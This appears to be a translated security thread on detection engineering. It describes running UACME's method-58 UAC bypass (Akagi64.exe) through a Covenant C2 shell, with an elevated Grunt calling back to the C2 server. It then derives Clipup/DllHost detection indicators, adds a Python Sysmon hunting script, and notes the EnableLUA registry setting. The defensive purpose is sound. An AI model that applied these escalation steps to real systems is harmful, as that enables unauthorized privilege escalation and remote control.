Many customers already log process starts and executed programs in a SIEM, or have an EDR in place. Nevertheless, the question keeps coming up: which product should we buy next? None! Better to build detections on the logs you already have. An example (🧵):
The file we use to bypass UAC is "Akagi64.exe": either compile it yourself from the UACME repository or download it (at your own risk) from a public source. Use the upload task in #Covenant to put the binary on the target host (given, of course, that we already have a shell).
The launcher shows the URL from which the PowerShell Grunt can be fetched from the #Covenant server. We use this code to have a new shell, hopefully with higher integrity, call back to our Covenant server.
Given that we have a shell, i.e. a Grunt at medium (normal) integrity, issue the following command via the ShellCmd task:
A few seconds later, a new Grunt with high integrity should appear. I took the screenshots a few months ago, so maybe this technique no longer works.
The UACME repository documents all of its UAC bypass methods, including number 58, which we used successfully to elevate our privileges.
A Google search for "Clipup" and "IEditionUpgradeManager" turns up the public detection rules from @elastic, which already cover this UAC bypass:
After running the bypass, we find the same indicators from the Elastic rule in our own logs: the process is Clipup.exe, its parent is DllHost.exe, and the parent's arguments reference the elevated COM interface (dllhost.exe acting as a COM surrogate with a /Processid:{CLSID} argument).
Building an alert or monitor on this parent/child combination should now be trivial.
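As an added example (this is not code from the thread and not Elastic's rule as published), here is the parent/child check described above written in Python and run over constructed Sysmon-style Event ID 1 records. The field names follow Sysmon (Image, ParentImage, ParentCommandLine, IntegrityLevel, UtcTime); the CLSID in the sample data is a placeholder, not the real one, and the `outside_system32` enrichment and the `required_clsid` knob are my additions, not part of the Elastic rule.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# A COM surrogate is started as: dllhost.exe /Processid:{CLSID}
# The CLSID names the (here: elevated) COM class that dllhost is hosting.
PROCESSID_RE = re.compile(
    r"/processid:\{([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}", re.IGNORECASE
)

# Expected home of the legitimate binary, used only for enrichment below.
SYSTEM32_CLIPUP = r"c:\windows\system32\clipup.exe"


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (Sysmon logs full paths)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Alert:
    utc_time: str
    clsid: str              # CLSID dllhost was hosting when it spawned clipup.exe
    image: str              # full path of the clipup.exe that was started
    integrity: str          # IntegrityLevel Sysmon reported for the child
    outside_system32: bool  # enrichment (my addition): clipup.exe ran from an unexpected path


def match_clipup_uac_bypass(event: Dict[str, str],
                            required_clsid: Optional[str] = None) -> Optional[Alert]:
    """Return an Alert if this Sysmon Event ID 1 record matches the pattern from the thread:
    child clipup.exe, parent dllhost.exe, parent command line naming a COM class.
    required_clsid (assumption/knob): pin the rule to one CLSID, e.g. the one in Elastic's rule."""
    if basename(event.get("Image", "")) != "clipup.exe":
        return None
    if basename(event.get("ParentImage", "")) != "dllhost.exe":
        return None
    m = PROCESSID_RE.search(event.get("ParentCommandLine", ""))
    if m is None:
        return None  # dllhost.exe was not running as a COM surrogate
    clsid = m.group(1).upper()
    if required_clsid and clsid != required_clsid.upper():
        return None
    image = event.get("Image", "")
    return Alert(
        utc_time=event.get("UtcTime", ""),
        clsid=clsid,
        image=image,
        integrity=event.get("IntegrityLevel", ""),
        outside_system32=image.lower() != SYSTEM32_CLIPUP,
    )


def hunt(events: Iterable[Dict[str, str]],
         required_clsid: Optional[str] = None) -> List[Alert]:
    """Run the rule over a stream of process-creation records and collect the hits."""
    return [a for a in (match_clipup_uac_bypass(e, required_clsid) for e in events) if a is not None]


# Constructed sample events (not real telemetry). The CLSID is a placeholder;
# substitute the one from Elastic's published rule before deploying.
PLACEHOLDER_CLSID = "00000000-0000-0000-0000-000000000000"
SAMPLE_EVENTS = [
    {   # ordinary user activity: no match
        "UtcTime": "2021-03-01 10:00:01.000",
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\Explorer.EXE",
        "IntegrityLevel": "Medium",
    },
    {   # a dllhost surrogate spawning something other than clipup: no match
        "UtcTime": "2021-03-01 10:00:02.000",
        "Image": r"C:\Windows\System32\rundll32.exe",
        "ParentImage": r"C:\Windows\System32\dllhost.exe",
        "ParentCommandLine": r"C:\Windows\System32\DllHost.exe /Processid:{11111111-2222-3333-4444-555555555555}",
        "IntegrityLevel": "Medium",
    },
    {   # clipup started from cmd.exe rather than a COM surrogate: no match
        "UtcTime": "2021-03-01 10:00:03.000",
        "Image": r"C:\Windows\System32\ClipUp.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'"C:\Windows\System32\cmd.exe"',
        "IntegrityLevel": "Medium",
    },
    {   # the pattern from the thread: clipup.exe under a dllhost.exe surrogate, high integrity
        "UtcTime": "2021-03-01 10:00:04.000",
        "Image": r"C:\Windows\System32\ClipUp.exe",
        "ParentImage": r"C:\Windows\System32\dllhost.exe",
        "ParentCommandLine": r"C:\Windows\System32\DllHost.exe /Processid:{" + PLACEHOLDER_CLSID + "}",
        "IntegrityLevel": "High",
    },
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

Only the last sample record fires. Leaving `required_clsid` unset catches any elevated COM class that ends up launching clipup.exe under dllhost.exe, which is broader than the Elastic rule; pin it to the published CLSID if that turns out to be too noisy in your environment.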
UAC can also be switched off entirely (EnableLUA = 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System). This setting is explicitly not recommended, but we encounter it repeatedly in assessments. The Hunt CmdShell in @velocidex (Velociraptor) can be used to search the fleet for disabled UAC.
This UAC bypass example shows nicely how an attack technique can be tested in a lab and the resulting logs analysed afterwards to craft detection rules from the observed behaviour.
@elastic has published several other rules; analysts can look at the ready-made rules there and integrate them into their environment: elastic.co/guide/en/secur…